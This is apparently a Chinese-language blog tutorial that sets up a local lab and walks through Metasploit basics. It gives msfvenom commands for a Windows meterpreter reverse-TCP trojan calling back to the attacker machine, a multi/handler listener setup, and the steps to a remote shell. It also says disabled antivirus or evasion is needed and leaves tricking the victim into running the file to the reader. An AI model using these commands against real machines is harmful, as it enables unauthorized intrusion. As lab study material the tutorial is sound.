为什么学kali很容易进局子?

前段时间学了msf的一些基础知识,正好有时间了,在本地搭建好了环境,准备练练手。(Tips:请勿用作非法用途,仅供学术交流)


MSF介绍

Metasploit Framework (MSF)是2003 年以开放源代码方式发布、可自由获取的开发框架,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠的平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,最新版本的MSF 包含了180多种当前流行的操作系统和应用软件的exploit,以及100多 个shellcode。作为安全工具,它在安全检测中起到不容忽视的作用,并为漏洞自动化探测和及时检测系统漏洞提供有力的保障。


配置环境

<code>kali:192.168.83.128
靶机:192.168.83.129/<code>
为什么学kali很容易进局子?


step1-生成木马

今天需要使用到msfvenom来生成木马。

基础用法作用-p, --payload使用攻击负荷。指定一个’-'或者输入(stdin)用户自定义的payloads(攻击负荷)。-f, --format输出格式(使用 --help-formats来查看变量格式列表)-o,–out保存攻击负荷(payload)

在此次实验中命令为:

<code>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.83.128 LPORT=4444 -f exe -o payload.exe/<code>

这里的LHOST为kali的IP,LPORT自然为kali的端口。

为什么学kali很容易进局子?

ok,生成成功。

为什么学kali很容易进局子?


step2-将木马传入到靶机

这一步就要靠自己的技巧了,而在这里我是在本地进行试验

(ps:自行试验时目标主机必须得关闭安全防护比如防火墙,360等等,如果没关,则需要对木马进行免杀处理,木马才能成功运行)

为什么学kali很容易进局子?

为什么学kali很容易进局子?

step3-使用msf侦听

为什么学kali很容易进局子?

<code>use exploit/mulit/handlerset payload windows/meterpreter/reverse_tcpset LHOST 192.168.83.128 //kali的ipset LPORT 4444 //kali的端口run/<code>
为什么学kali很容易进局子?


step4-运行木马

这一步是通过你自己的技术,使对方运行你的木马,由于我是在本地试验,就不赘述了。

为什么学kali很容易进局子?


step5-获取shell

当对方成功运行木马之后,就会反弹一个shell。

为什么学kali很容易进局子?

在meterpreter后输入shell即可获取目标靶机的一个shell

(类似于cmd,可以执行系统命令)

为什么学kali很容易进局子?


相信看到这里,大家应该心中都有了答案,入侵一个系统确实不难,所以咱们得把技术用到正地方,而不是想着如何入侵别人的系统,本文也仅供学术交流,大家千万不要在真实环境试验,可以的话,自行搭建本地环境,锻炼一下自己的技术,本文实现起来不算很难,最后的最后,感谢支持!


分享到:


相關文章: